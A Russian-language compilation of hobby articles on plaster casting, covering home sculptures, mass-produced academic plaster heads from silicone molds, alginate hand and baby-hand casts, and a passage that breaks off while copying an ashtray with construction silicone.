17 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Бюст из гипса своими руками

Скульптуры из гипса своими руками: техника выполнения, формы и рекомендации

Гипс – материал, широко применяемый в творчестве и строительстве с незапамятных времен. Точно известно, что использовался он еще в античности для изготовления скульптур. Сегодня гипс применяют в своей работе профессиональные архитекторы и скульпторы. Каждый из нас может приобрести этот материал в строительном магазине для личных нужд. Скульптуры из гипса несложно изготовить в домашних условиях, не будучи профессионалом. Подробная инструкция и советы по работе — специально для вас.

Основные характеристики гипса

В любом строительном магазине вы найдете гипс-порошок или гипсовые штукатурки. Материал изготавливается из осадочной породы – гипсового камня. Столь разнообразным и широким применением в строительных работах гипс обязан своей доступности в сочетании с низкой стоимостью. Работать с данным материалом достаточно просто. Необходимо развести его с водой, после чего можно приступать к заливке форм или моделированию. Внимание: гипс очень быстро застывает на воздухе и при этом незначительно увеличивается в объеме (не более чем на 1%). Готовьте раствор на один раз, непосредственно перед началом работы с ним. Материал способен передавать мельчайшие детали. При желании скульптуры из гипса можно задекорировать красками и иными отделочными составами, и создать качественную имитацию благородного камня или металла.

Способы изготовления гипсовых скульптур

Если вы не являетесь профессиональным скульптором, начать работу с гипсом имеет смысл с изготовления скульптур методом формовки. Данная технология предполагает получение готовых изделий путем заливки гипсового раствора в формы. Формовка – очень простой способ создания скульптур, который подходит даже для детского творчества. С детьми в возрасте до 12 лет творческие занятия должен проводить взрослый. Альтернативный вариант, как сделать скульптуру из гипса – смоделировать желаемую фигуру из разведенного гипса на каркасе. В работе удобно использовать разнообразные шпатели и прочие инструменты. Какие скульптуры можно изготовить из гипса своими руками? Материал в застывшем виде является достаточно пористым и хрупким. Но несмотря на это, он может применяться для изготовления уличной скульптуры. Идеален гипс для создания элементов интерьера и декоративных фигурок. Если вы только начинаете работать с этим материалом, попробуйте в первый раз сделать что-то небольшое и простое по форме. Постепенно совершенствуя свое мастерство, вы научитесь создавать из гипса настоящие шедевры.

Готовая форма или самостоятельно сделанная?

Для изготовления гипсовых скульптур можно использовать готовые формы. Они продаются в магазинах товаров для творчества. Интересная идея — использовать кулинарные формы, например, для льда, кексов или конфет. В совместном с детьми творчестве можно использовать для отливки из гипса формочки для песка. Если же ничего интересного подобрать не удалось, попробуйте изготовить форму своими руками. Простые скульптуры (например, интерьерные колонны или крупные грибы для украшения сада) можно сделать при помощи бытовых приспособлений. К примеру, шляпку для гриба можно отлить в тазике или миске подходящего размера, а ножку – в обрезанной пластиковой бутылке. Формы для отливки можно снять с любых имеющихся фигурок и статуэток. Обтяните выбранное изделие пищевой пленкой. После чего облепите его глиной или пластилином. Дождитесь затвердевания материала, после чего осторожно разрежьте форму и вытащите из нее спрятанную внутри фигурку. Ваша самодельная форма готова, теперь вы можете делать скульптуры из гипса.

Подготовка формы и заливка гипса

Форма нуждается в специальной обработке перед началом работы. Тщательно промажьте внутренние стенки вазелином, растительным маслом или парафином. Особое внимание уделяйте мелким элементам отливки. Скульпторы-профессионалы нередко готовят специальную смазку для обработки форм. Возьмите 2 части натертого на крупной терке мыла, добавьте 1 часть растительного масла и 7 частей воды. Перемешайте компоненты до однородной консистенции. Смазка готова – можно приступать к обработке внутренней поверхности формы. Ни в коем случае не пропускайте данный этап, в противном случае вы не сможете вытащить готовое изделие после его застывания. Как сделать скульптуру из гипса своими руками, как правильно развести сухую смесь? Порошок достаточно смешать с водой до консистенции сметаны. Обязательно оставьте гипс на несколько минут, а затем, тщательно перемешав, приступайте к наполнению формы. В воду для приготовления гипсового раствора можно добавить небольшое количество клея ПВА – не более 25% от общего объема жидкости.

Защитная обработка изделия

Оптимальная для сушки гипсовых изделий температура — 16-25 градусов. Скульптуры, изготавливаемые методом формовки, следует извлекать из форм после полного затвердевания. На этой стадии можно подшлифовать неровности кистью или мокрой губкой. Если форма скульптур из гипса вас полностью устраивает, оставьте их на некоторое время для окончательной просушки. Следующий этап – подготовка фигурок к покраске. Нанесите в несколько слоев на всю поверхность изделия специальную грунтовку. Можно заменить ее клеем ПВА, разбавленным водой. Если вы изготовили скульптуру, которая будет стоять на улице, можно для дополнительной защиты обработать ее олифой или шеллаком.

Декор скульптуры

После высыхания грунтовки можно приступать к наиболее творческой части процесса – оформлению скульптуры. Садовые скульптуры из гипса необходимо покрасить наиболее стойкими красками. Небольшие фигурки и детские поделки можно раскрашивать гуашью. Для покраски скульптуры, которая будет находиться в помещении, можно использовать любые краски и техники их нанесения. После покраски можно дополнительно покрыть изделие слоем прозрачного лака для закрепления декора. Если это уместно, дополнительно украсьте скульптуры из гипса декоративными элементами. Это могут быть отдельные бусинки и стразы, банты, текстильные детали или специальные пластиковые фигурки.

Полезные советы

Соблюдайте все правила работы с гипсом и последовательность технологических этапов. Очень часто проблемы в работе с этим простым материалом возникают при нарушении технологии изготовления скульптуры. Обязательно тщательно просушивайте изделия после извлечения из формы и только после этого приступайте к их дальнейшему оформлению. Попробуйте использовать различные формы для изготовления скульптур. В качестве образцов для их изготовления подойдут любые мелкие фигурки, детские игрушки и бытовые предметы. В описанной технике в домашних условиях можно сделать слепки рук. Изготовление скульптур из гипса – это интересный и доступный каждому вид творчества!

master_klass

Мастер-класс

каждый из нас – Мастер

Гипсовая голова своими руками

Гипсовая голова, если кто не знает, это в первую очередь пособие для академического рисунка, ну и фотографы их часто используют в обучении. Многие используют конечно просто для интерьера.
Теперь я Вам расскажу и покажу как они рождаются.

Многие люди думают, что их лепят из гипса :-). И вообще у людей не имеющих представление о гипсе, глубоко засело мнение что из гипса лепят. Время схватывания гипсового раствора 5-10 минут. А фаза, когда раствор хоть немного напоминает глину, и пригоден собственно для лепки, длится менее минуты. Ну и что за такой период времени можно успеть? Поэтому открою многим страшную тайну,

Силиконовая форма выглядит вот так. Как делаются формы, это тема для отдельного мастер-класса, если интересно напишу об этом позже. Любопытно, что, когда смотришь на вогнутую форму, видишь выпуклое изображение. Почему так получается, не знает никто. Может кто в комментариях подскажет?

А вот половинка формы в кожухе. На заднем плане формы для других голов.

Создание гипсовой головы начинается с гипсового раствора. Рецепт гениально прост: гипс и вода. Заливаем воду в емкость (в нашем случае пластиковая бутыль, точнее, ее нижняя часть).

Насыпаем совком гипс до образования небольшой горочки над поверхность воды.

Тщательно мешаем до полного растворения комочков.

Заливаем эту смесь в заранее собранную форму.

Тщательно крутим форму, чтобы гипс равномерно распределился, осел на стенках формы ровным слоем.

Повторяем эту процедуру полностью минимум 2 раза, чтобы избежать тонких стенок. А можно после первой заливки, развести гипса побольше и залить до полного заполнения формы если хотите цельную голову. Но мы делаем полую.
Контрольный взгляд внутрь.

Внутри формы гипс схватывается практически навсегда, обретая форму головы античного героя. Переделать, изменить что-то уже нельзя. Ж дем не менее 20 минут. Вынимать лучше когда отливка горячяя. Да, да, в процессе схватывания гипс греется до 60-70 градусов по Цельсию. Все. Пора посмотреть, что же у нас получилось.
Первым делом отвинчиваем крепежные болты.

Дальше осторожно разъединяем половинки формы.

Вот так выглядит силиконовая форма в кожухе.

Снимаем вначале одну половинку формы, затем другую.

И вот он — красавчик Антиной!

Кто таков был Антиной, я здесь рассказывать не буду по этическим соображениям. Кому интересно сам найдет. Для нас важно, что изображений и статуй его сохранилось великое множество, больше чем любого другого его современника, и все они, хоть и выполнены, по-видимому, разными авторами, схожи между собой, так что, надо полагать, близки к оригиналу.
А это другой вариант портрета Антиноя. Похож?

Но получить отливку — это еще не все. Ее еще надо довести до ума, убрать заусенцы, и отшлифовать по месту соединения формы.

Вот шов крупным планом.

Ну что — берем нож и вперед!

В волосах посложнее немного.

Отправляем нашего Антиноя в сушилку! В компанию к другим антиноям, афродитам, и аполлонам.

Здесь он проведет несколько дней. Гипс ведь только схватывается быстро, а сохнет, на удивление долго, в зависимости от величины изделия и толщины его стенок, а так же окружающей температуры и уровня влажности. Когда он высохнет, потеряет до половины веса сырого изделия, и станет белоснежным. Только в таком состоянии производится окончательная шлифовка по шву.

Гипс — удивительный материал, который нашел применение в самых разных отраслях — в строительстве, в археологии , в медицине, ну в изобразительном искусстве конечно. Например, если кто не знает, Изобразительный музей имени Пушкина, цветаевский, создавался как музей слепков. И собственно, почти все копии с античных статуй, собранных в нем и выглядящих как бронзовые либо мраморные — это гипсовые отливки, снятые по определенной технологии в натуральную величину и тонированные под бронзу или мрамор, Например, все, что находится в греческом дворике, в римском зале, в греческом, черная колонна Траяна, огромный портала собора во Фрейберге, надгробия, конные статуи кондотьеров (тех, что гнались за героем Никулина в фильме «Старики-разбойники»), да тот же Давид Микеланджело в одном из главных залов ГМИИ.

kak_eto_sdelano

Как это сделано, как это работает, как это устроено

Самое познавательное сообщество Живого Журнала

Вам наверное часто встречались гипсовые головы, копии скульптур античных героев и просто известных исторических личностей. Помимо эстетического назначения у них есть и прямое предназначение — это учебные пособия для академического рисунка. В отличии от натурщика, они не двигаются, не просят денег, на них идеально распределяется свет, ну и они могут позировать бесконечно. Их часто используют и фотографы, для обучения светотени например.

Рисовать гипсовые головы начали довольно давно, как минимум с конца 18 века. Снимали слепки в музеях или заказывали у известных скульпторов слепить копию. Затем, в ограниченном количестве, делали отливки как правило в самом учебном заведении, или заказывали их у тех же скульпторов. С того времени учащихся и учебных заведений явно поприбавилось, ну а раз возник спрос, значит и массовое производство должно быть.

Многие люди думают, что головы лепят из гипса :-). И вообще у людей не имеющих представление о гипсе, глубоко засело мнение что из гипса лепят. Время схватывания гипсового раствора 5-10 минут. А фаза, когда раствор хоть немного напоминает глину, и пригоден собственно для лепки, длится менее минуты. Ну и что за такой период времени можно успеть? Поэтому открою многим тайну, что все гипсовые изделия льют в специальные формы. Лепнину еще можно делать протяжкой, но по сути это тоже форма, только подвижная. Они могут быть из различных материалов, и из гипса тоже. Мы делаем формы сами из специального селиконового компаунда. Они предназначены для массового тиражирования. С одной такой формы получается от 1000 копий.
Кратко покажу этапы создания.
Форму снимают со специально подготовленной модели.

Модель должна быть с идеально гладкой поверхностью. Для этого мы ее покрываем специальным лаком.

Затем создается жесткий каркас. Да забыл сказать, что работа полностью ручная. И каждое изделие хранит тепло наших рук. 🙂

Затем, между моделью и кожухом заливается силикон.

Готовая силиконовая форма выглядит вот так.

Или вот так, из двух-трех частей. Любопытно, что, когда смотришь на вогнутую форму, видишь выпуклое изображение. Почему так получается, не знает никто. Может кто в комментариях подскажет?

А вот половинка формы в кожухе. На заднем плане формы для других голов.

Создание гипсовой головы начинается с гипсового раствора. Рецепт гениально прост: гипс и вода.

Заливаем эту смесь в заранее собранную форму.

Внутри формы гипс схватывается практически навсегда, обретая форму головы античного героя. Переделать, изменить что-то уже нельзя. В процессе схватывания гипс греется до 60-70 градусов по Цельсию.

Но получить отливку — это еще не все. Ее еще надо довести до ума, убрать заусенцы, и отшлифовать по месту соединения формы.
Вот шов крупным планом.

Далее все изделия отправляются в сушилку.

Процесс сушки длиться несколько дней. Гипс ведь только схватывается быстро, а сохнет, на удивление долго, в зависимости от величины изделия и толщины его стенок, а так же окружающей температуры и уровня влажности. Вот для сравнения изделия разной степени просушки.

Когда изделие полностью высохнет, потеряет до половины веса, и станет белоснежным. Только в таком состоянии производится окончательная шлифовка по шву.
Когда все этапы пройдены, изделия упаковываются в стрейч пленку, чтобы предотвратить запыление и потертости.

А вот так они выглядят например в одном из художественных магазинов в Москве.

Спрашивайте, если я тут что-то не очень подробно показал, в комментариях постараюсь дать развернутый ответ.

Литье из гипса

Гипс — доступный и легкий в обработке материал. С доисторических времен литье из гипса наравне с лепкой из глины использовалось для изготовления различных поделок, игрушек и ритуальных фигурок.

И в наши дни гипс сохраняет свою популярность как поделочный материал. Из него делают также украшения и детали масштабных моделей техники.

Процесс литья из гипса

Процесс литья из гипса состоит из нескольких этапов. Само литье в гипсовые формы занимает минуты, гораздо больше времени уходит на подготовительные и завершающие операции. К подготовительным относятся:

  • Изготовление модели изделия.
  • Проектирование и изготовление формы, или опоки.
  • Подготовка материалов для литья смазывания формы.

Процесс литья из гипса

Проверьте, чтобы все необходимые материалы, оборудование и инструменты были под рукой, отмыты и очищены после прошлого раза. Счет при отливке идет на минуты.

Непосредственно перед литьем в гипс следует произвести смазывание опоки и смешивание раствора для литья. Заливать растров в отверстие следует тонкой струйкой, обязательно давая воздуху возможность выйти. После заливки форму надо повращать и слегка потрясти, чтобы добиться максимального прилегания раствора к мелким деталям рельефа.

Завершающие операции не менее важны. Они так же определяют качество изделия. К ним относятся

  • Сушка (при естественной температуре или на радиаторе). Слишком быстрая сушка может привести к растрескиванию отливки.
  • Разборка формы. Если она плохо отходит от изделия, можно легонько обстучать ее деревянным или резиновым молоточком.
  • Удаление литников и доработка деталей готового изделия.
  • Очистка опоки (если планируется еще одна или несколько отливок).

Литье в гипсовые формы немного отличается от литья в формы из силикона. Силикон не нуждается в смазке, он упруг и из него легче извлекать отливку, к тому же он дает больше возможностей для проработки деталей.

Необходимое оборудование и материалы

Для отливки изделий из гипса не требуется высокопрофессиональное оборудование. Процесс вполне доступен в любительской домашней мастерской.

Важно: подготовка, сам процесс литья и завершающие операции связаны с появлением большого количества пыли. Обязательно должна быть обеспечена качественная вентиляция и уборка помещения. Не стоит заниматься этим в жилых помещениях и в домах, где живут аллергики. Кроме того, смесь воздуха и пыли в определенной концентрации взрывоопасна. Избегайте использования открытого огня в мастерской.

Формы для отливки из гипса

Основным оборудование является форма для отливки. Для ее изготовления сначала следует подготовить модель изделия. Для этого подходит пластилин, полимерная глина, любой пластичный материал. Если делают копию, то моделью является сам оригинал. Обязательно нужно наметить на модели линию стыка половинок будущей формы.

Важно правильно подобрать материал для опоки. Если готовится маленькая формочка для литья кулона или деталей масштабной модели техники — подойдет жесткий картон. Для литья крупных отливок лучше взять многослойную фанеру — ее не разопрет большой массой гипса.

Опока из жесткого картона для литья из гипса

  • Емкость для смешивания гипса с водой.
  • Стакан с носиком для заливки гипса.
  • Резинки для стягивания частей формы.
  • Кисточки для смазки.
  • Дрель для сверления отверстий.
  • Шпатели и ножи.
  • Картон и скотч.

Гипс для литья следует выбирать самый лучший. Строительный алебастр можно применять, в крайнем случае, его лучше просеять через сито 0.2 мм, убедиться в том, что он достиг «пуховой» консистенции, не содержит комочков и посторонних включений.

Смазка формы для литья из гипса

Смазку для формы можно приобрести готовую, а можно изготовить самостоятельно из натертого на терке детского мыла, воды и подсолнечного масла.

Изготовление форм для литья из гипса

Наиболее используемыми материалами являются сам гипс и силикон.

Формы из гипса являются традиционными и привычными для многих поколений мастеров. Они более требовательны к уровню мастерства при изготовлении. В последние десятилетия их все больше теснят формы из силикона.

Формы, которые сделаны из силикона, отличаются высокой точностью, возможностью проработки мелких деталей, легкостью изготовления и снятия ее с отливки. Несколько дороже обходится исходный состав, но это компенсируется повышенной технологичностью и долговечностью.

При проектировании и изготовлении формы важно обращать внимание на:

  • Тщательность проработки деталей.
  • Способ соединения половинок формы и их последующей разборки
  • Способ фиксации половинок друг относительно друга
  • Расположение отверстий для литья. Оно должно позволить жидкому гипсу проникать во все уголки формы и полностью заполнять ее.
  • Конфигурация опоки должна давать пузырькам воздуха свободный выход.

Для фиксации частей опоки друг относительно друга обычно используют резиновые ленты. Для маленьких изделий подходят резинки для денег, для более крупных их вырезают из велосипедных или автомобильных камер.

Изготовление гипсовых форм для литья

Литье в гипсовые формы требует определенного навыка, хорошего планирования и точной координации действий мастера. Как сделать форму для литья из гипса?

Сначала вокруг модели будущего изделия строится опока — ящичек из картона, обклеенного скотчем, или жесткого пластика. Щели между основанием и стенками помазываются пластилином. Модель покрывается смазкой и размещается внутри опоки на равных расстояниях от дна и стенок. В качестве подпорки используют кусочки пластика, картона. Иногда просто подвешивают модель на нитках.

Гипс разводят до консистенции сметаны

Гипс разводят до консистенции сметаны, кисточкой наносят на сложные элементы рельефа модели — углы, впадины и т.п. Все готово к литью. Потом заливают модель до линии стыка половинок опоки и оставляют гипс загустевать.

Гипсовая форма для литья

После загустевания проверяют, насколько хорошо модель отделяется от нижней половинки, смазывают ее и модель и заливают верхнюю половину формы. После загустевания верхней половинки по углам сверлят отверстия для штифтов, которые будут фиксировать половинки при отливке. После этого верхнюю половинку снимают, модель удаляют. Опока готова к отливке. Если вы начинающий мастер, запланируйте достаточно времени на приобретение опыта и наработку навыков. Литье в гипс может получиться не с первого раза.

Область применения литья из гипса

Литье из гипса применяется как на промышленных предприятиях для изготовления деталей отделки помещений, так и в авторских мастерских. Мастера льют из гипса весьма широкий ассортимент

  • Авторские элементы декора помещений
  • Статуэтки и даже большие статуи, вплоть до моделей для последующего литья из металлов
  • Небольшие украшения
  • Игрушки
  • Детали для масштабных моделей техники

Этим перечнем область применения не ограничивается. Мастера придумывают все новые и новые области применения литья из гипса — везде, где нужно создать детали со сложными поверхностями и рельефом, а требования к прочности и износостойкости не являются критически важными.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Гипсовая рука своими руками: как ее сделать?

Изготовление гипсовой руки своими руками доступно каждому желающему. Отливка, выполненная по всем правилам и с соблюдением пропорций при замешивании рабочего раствора, получится очень реалистичной.

От качества гипса будет зависеть внешний вид готового изделия и его прочностные характеристики. Чтобы добиться максимальной схожести, необходима качественная форма. Для ее изготовления используют специальные материалы.

Для влюбленных гипсовая отливка пары сплетенных вместе рук может служить подарком к знаменательной дате. Часто такую композицию заказывают молодожены в день свадьбы.

Детские слепки ладошек и ножек заказывают родители на память в дополнение к фотографиям и видео со своими малышами. Такой сувенир, оформленный в нарядную рамочку, можно подарить родным и близким как воспоминание о памятной дате: первом или юбилейном дне рождения, крещении, первом самостоятельном шаге ребенка и т. п.

Можно создать целую коллекцию таких слепков, сделанных в разные периоды активного роста ребенка. Позже, держа их в ладонях, дети, возможно, будут вспоминать о счастливых мгновениях своего детства.

Изящная гипсовая рука, своими руками изготовленная и декоративно оформленная, может служить и деталью оригинальной композиции. Такую декорацию, к примеру, можно использовать и как манекен для хранения колец.

Для отливок в формы существует много различных материалов. Это парафин, воск, бетон, силикон, металлы, даже шоколад можно залить в пищевую форму. Сейчас доступными стали составы пластмасс, смолы. Все они имеют свои специфические особенности литья. Чтобы ответить на вопрос о том, как сделать гипсовую руку, сначала нужно понять, что это за материал. Также важно разобраться в технологии его литья.

Порошок гипса – это природный материал. Он имеет белый или сероватый цвет, тонкий помол, быстро впитывает влагу при добавлении воды. Получают его обжигом гипсового камня и различают по назначению: для медицинских целей, для формовки, для штукатурных работ и производства плит.

Гипс для строительства имеет более крупный помол, медицинский – самый чистый, формовочный – медленнее схватывается. Полезным свойством для скульптур является увеличение (до 1%) рабочего состава в объеме. Это расширение дает возможность заполнить мелкий рисунок формы. При приготовлении раствора уже через несколько минут он начинает затвердевать и полностью схватывается в течение 20 минут.

Особенности технологии

Хранить гипсовый порошок нужно в сухом месте. Подмоченный или отсыревший материал непригоден для литья, он не схватывается. Ухудшаются его характеристики и от длительного хранения. Рабочий раствор гипса готовят быстро. От длительного перемешивания он «отмолаживается» и слабее схватывается, что в итоге приводит к потере прочности готового изделия.

Если рабочий раствор затвердел до завершения заливки, он для работы уже непригоден. Добавление воды и повторное его перемешивание ситуацию не исправит. Замедлить схватывание раствора может помочь жидкий клей. Его (3-4 ложки на ведро воды) добавляют предварительно и хорошо перемешивают.

Сушить отливку нужно при температуре до 60 градусов. Превышать этот предел не желательно – материал теряет прочность и начинает разлагаться. Гипсовая рука своими руками изготавливается с учетом всех этих нюансов. Чтобы сделать готовое изделие крепче, раствор замешивают на известковом молоке.

Влага и сырость отрицательно воздействуют на изделия из гипса, поэтому использовать и хранить их нужно в помещении, особенно если они не имеют защитного покрытия.

Подготовительные операции

Изготовление гипсовой руки своими силами возможно в домашних условиях без применения каких-то особых технологий и специального оборудования. Однако чтобы процесс литья прошел гладко, нужно тщательно подготовиться. Разные партии гипса (особенно строительного) могут иметь различное время схватывания.

Чтобы точно узнать его, лучше всего провести пробный замес и заливку небольшого количества раствора в любую простую форму. Это позволит точно рассчитать пропорции гипса и воды, определить временной отрезок, в пределах которого раствор сохраняет литьевые свойства. В итоге это поможет сэкономить материал, время и нервы.

На этапе подготовки определяются с емкостью для формы, а также подбирают подходящий сосуд для замешивания гипсового раствора. Для разовой заливки можно взять одноразовую посуду. Если планируется заниматься литьем и дальше, лучше всего приобрести резиновую гипсовку для замешивания рабочего раствора.

Для этих целей подойдет половинка старого детского мяча. Засохший гипс со стенок легко отшелушивается при деформации резины. Кожу руки, которая будет погружаться в формовочную массу, можно смазать тонким слоем касторового масла или вазелина.

Простая форма из глины

Пробный гипсовый слепок руки можно с успехом отлить в форму из глины. Это не будет полноценная объемная копия, но она даст возможность получить первый практический опыт. Глина – это доступный материал, ее можно использовать многократно после неудачных попыток, что как раз подходит для начинающих.

Нужны два отрезка доски или фанеры по размеру больше ладони на 5 см. Их и руку смазывают растительным маслом или вазелином. Это нужно для того, чтобы глина не прилипала. На доску кладут ладонью руку, плотно ее прижимают и начинают наносить поверх смоченную водой и размятую до состояния густого теста глину, хорошо вминая ее и уплотняя.

Общий слой должен получиться не менее 5 см. Верх его разравнивается по плоскости и накрывается другой доской. Вся конструкция вместе с рукой осторожно переворачивается. Нижняя доска убирается, и ладонь осторожно освобождается. Форма для заливки готова. Чтобы получить идеальные отливки, используют пластичные формовочные массы.

Альгинат для слепков

Чтобы изготовить форму для объемной отливки сложной формы, используют специальные составы. Одним из наиболее доступных вариантов является альгинатная масса. Ее основное назначение — изготовление слепков в стоматологической практике. Но такой материал вполне подойдет и для скульптурных отливок.

Альгинат – это сырье из морских водорослей. Сухой его порошок, смешанный с водой в точных пропорциях, быстро густеет и приобретает свойства плотного желе. Если до начала процесса схватывания в такую массу поместить руку, а затем, после достижения оптимальной плотности, ее аккуратно извлечь, то в форме образуется полость. Если в нее влить гипсовый раствор, то он после твердения образует точную копию руки.

Извлечь отливку без разрушения формы не удастся. Альгинатная масса в состоянии пластичности находится недолго, она начинает терять влагу, становится хрупкой и разрушается от деформации. Поэтому заливку рабочим составом следует производить сразу же после извлечения руки. В этом случае можно ожидать высокого качества отлитой копии.

Некоторые марки альгинатных масс меняют цвет по мере твердения. При замешивании они имеют один оттенок, в начальной фазе схватывания (оптимальный момент погружения руки) – другой, после достижения плотности (когда можно извлекать конечность) – третий. Процесс изготовление гипсовой руки с помощью такого формовочного материала по силам любому желающему.

Приготовления раствора

Гипсовая рука своими руками отливается в заранее подготовленной форме. В емкость для замешивания набирается чистая холодная вода в необходимом количестве. В нее равномерно насыпают сухой порошок гипса. В идеале он должен образовать горку над поверхностью.

Гипс начинает интенсивно впитывать воду. В это время его нужно хорошо размешать. Не следует это делать слишком интенсивно, так как образуются пузырьки воздуха. Они остаются в растворе, попадают в форму и после его застывания образуют раковины и каверны. Поэтому использовать дрель с насадкой для замешивания можно только на малых оборотах. Лучше все сделать вручную, используя ложку или деревянную мешалку. Цель – получить однородную массу без комков, по густоте напоминающую сметану.

Пропорции вода/гипс (приблизительно один к двум) определяются экспериментальным путем заранее. После окончания замешивания емкость слегка обстукивают для выхода пузырьков воздуха на поверхность. Образовавшуюся пену собирают ложкой. Приготовленный рабочий раствор сразу же заливают в форму. Времени от начала замешивания до заливки – не больше минуты-полторы.

Заливка в форму

Гипсовая рука своими руками изготавливается методом отливки в подготовленную форму. Раствор добавляют порциями. Если им заполнить сложную форму сразу, то в ней могут образоваться воздушные мешки. В такие пустоты гипсовый раствор не попадает, в результате готовая модель будет иметь дефекты.

Чтобы избежать этого, форма проворачивается во все стороны после вливания первой небольшой части рабочего раствора. Так он растекается по внутренней поверхности и попадает во все углубления. Воздух внутри не скапливается и постепенно вытесняется.

Со следующей порцией гипсовый раствор осаждается на стенках все больше, его слой становится толще. Когда сложные поднутрения полностью заполняться, можно залить оставшуюся часть гипса.

Изготовление гипсовой руки своими руками

Технология изготовления слепка детской руки немного отличается от рабочего процесса со взрослыми. Дело в том, что ребенок, как правило, не может удержать руку в постоянном положении, пока не схватится формовочная масса. Движения пальцами во время формовки все портят. Поэтому лучше всего эту процедуру проводить во время сна в его глубокой фазе.

Используется альгинатная формовочная масса. Ее замешивают в посуде подходящего размера. Все компоненты подготавливаются заранее согласно инструкции. В воду засыпают порошок альгината и размешивают его ложкой до однородного состояния около одной минуты.

Для взрослых используется холодная вода. Но чтобы ребенок во время сна не проснулся от соприкосновения с прохладной массой, ее лучше подогреть. Теплая вода для замешивания существенно сокращает время использования формовочной массы, поэтому все нужно делать быстро.

Когда смесь будет готова, ее переливают в подходящий стакан, подобранный по руке ребенка, и помещают туда его конечность. Время твердения массы 1-2 минуты. В этот период нужно сохранять форму в покое, чтобы получить качественный отпечаток.

Спустя отведенное время руку младенца аккуратно извлекают. Как правило, это происходит без проблем, так как форма пластична и не деформируется от легкой нагрузки.

Сразу же после этого готовится рабочий раствор и производится заливка. Выдерживают гипс в форме не больше 30 минут. Позже альгинатная масса начинает отдавать воду, что отрицательно будет сказываться на отливке. Форма извлекается из стакана, разрезается на части, гипсовый отпечаток руки ребенка освобождается. Его очищают и оставляют сохнуть.

По такому же принципу делают отливку руки взрослого человека или ребенка, который может удержать руку в покое во время формовки.

Наборы для самостоятельного изготовления 2D- и 3D-слепков

В последнее время популярностью у обывателей пользуется скопированная сувенирная гипсовая рука. Своими руками как ее сделать, подробно изложено в инструкции к готовым наборам для моделирования. Такой комплект идеально подойдет для желающих попробовать свои силы в объемном литье, но не имеющих возможности или не желающих разбираться в марках формовочных масс и гипса.

Стоить набор будет дороже, чем отдельно приобретенные компоненты. Но производители делают упор на удобстве такой комплектации. К тому же они дают гарантию качества на свои материалы. В набор входит сухая гипоаллергенная масса для форм, ее просто приготовить, залив водой в необходимом соотношении. Имеется также и модельный очищенный гипс повышенной прочности.

В комплект для получения отливок простых оттисков рук или ног входит пластичная формовочная масса многоразового использования. Перед употреблением ее разминают, делают оттиск и заливают в него гипс. После застывания отливку извлекают. Если не предполагается повторной заливки, форму снова разминают до мягкого состояния и откладывают на хранение, упаковав в полиэтиленовый пакет.

Отделка

Как сделать гипсовый слепок руки законченной композицией? Для этого его необходимо покрасить. Для кого-то идеальным вариантом будет тонировка краской под золото или бронзу. Другой выберет телесный оттенок или белый цвет.

Для декоративного покрытия подойдет акриловая эмульсия, но ее слой, хоть он и тонкий, может сгладить мелкие линии и складки на слепке. Хотя, если копия получилась неидеальной, то такой вариант вполне подойдет. Если же нужно сохранить мельчайшие подробности, лучше использовать аэрозольную краску.

Перед отделкой слепок осматривается, все неровности шлифуются, дефекты исправляются. Для того чтобы краска легла равномерным слоем, заготовку можно предварительно загрунтовать, дать ей высохнуть и после этого еще раз отшлифовать тонкой наждачной бумагой.

Для установки подбирают декоративное основание на свое усмотрение и монтируют копию руки или композицию с ней на клей. После высыхания сувенир для большего эффекта можно покрыть лаком.

Как сделать гипсовою руку самому для тиражирования копий?

Отработав технологию литья и изготовления форм, можно попытаться расширить ассортимент продукции. Скопированная гипсовая рука, своими руками изготовленная, может служить деталью оригинальной композиции.

К примеру, если отлить ее в положении удерживания предмета, она может служить подставкой для телефона. В другом случае это может быть основание подсвечника или настольной лампы. В гипсовую руку можно установить декоративный стакан и такая композиция превратится в держатель для ручек или оригинальную вазу для цветов.

Для массового копирования изготавливать одноразовые формы нецелесообразно. В таком случае лучше подойдет эластичный силикон. Формы из этого материала можно использовать многократно. Для извлечения отливки их разрезают с одной стороны и осторожно достают копию.

Силикон устанавливается в емкость, в которой он заливался при изготовлении, и процесс повторяется. Для удобства извлечения отливок можно пользоваться разделительными составами. В такие формы можно заливать не только гипс, но и парафин, олово или шоколад. Фантазия авторов безгранична – главное, не бояться экспериментировать!

Как сделать копию из гипса своими руками с помощью монтажного силикона

Заказали в интернет-магазине из Китая вот такую вот пепельницу, приехала она где то через месяц, коробка была слегка раздавлена, но сама пепельница цела. Сделана она из чего то мягкого, похожего на гипс ибо очень легко крошится ногтем. К сожалению курящих в семье нет, поэтому приспособили её как подсвечник. А после того как она попалась на глаза друзьям и знакомым, то они тоже стали просить заказать им такую же. В начале хотел снова заказать из Китая, но передумал, уж очень много они просят за гипсовую отливку. К тому же неизвестно что и в каком состоянии приедет из под маховика Российской почты. 🙂

Решил попробовать сделать копию этой пепельницы, так как кое какие мелочёвки я уже отливал в разнообразные формочки из гипса, эпоксидки и силикона. Там правда масштабы деталей были по скромней, но тем не менее, решил попробовать клонировать и сие чудо.

Для начала приклеил на пепельницу кусок утеплителя, который будет выполнять роль подставки и ручки, за которую можно было бы держать пепельницу при обмазывании её силиконом. После чего нагрел её на огне, чтобы можно было смазать её тонким слоем парафина. Если её не нагревать, то парафин будет моментально застывать на холодном гипсе, в результате закроет собой всю мелкую детализацию на пепельнице. Но и греть её старался без особого фанатизма, чтобы краску не вспучило, так как чёрт его знает, чем они её там красили.

Сначала думал просто смазать её каким нибудь гуталином или маслом, как я это делал в других своих формах. Но так как силикон буду использовать обычный строительный, то тут скорее всего всплывёт другая проблема. Как намазывать его на скользкую деталь, ибо густой силикон скорее всего будет прилипать к рукам, нежели к скользкой пепельнице. Поэтому остановил свой выбор на парафине, он застывает и становится относительно твёрдым, к тому же, к нему мало что прилипает, в общем идеальный разделитель.

Купил как и в прошлый раз, вот такой вот самый дешёвый строительный силикон (Универсальный герметик), 100р за тубу.

Разрезаем ножом тубу и обмазываем равномерно силиконом всю нашу пепельницу, кроме конечно основания. Сначала обмазывал её в полиэтиленовых перчатках, но силикон очень липкий и вскоре перчатки превратились в бесформенный комок. Поэтому домазывал остатки силикона уже голыми руками, к тому же лучше чувствуешь где промазал а где нет. Особое внимание уделяем мелкому рисунку на пепельнице. То есть сначала вдавливаем пальцами силикон в мелкий рисунок на детали, а затем, добавляя силикон, выходим на равномерную его толщину по всей поверхности, у меня это примерно 5 мм.

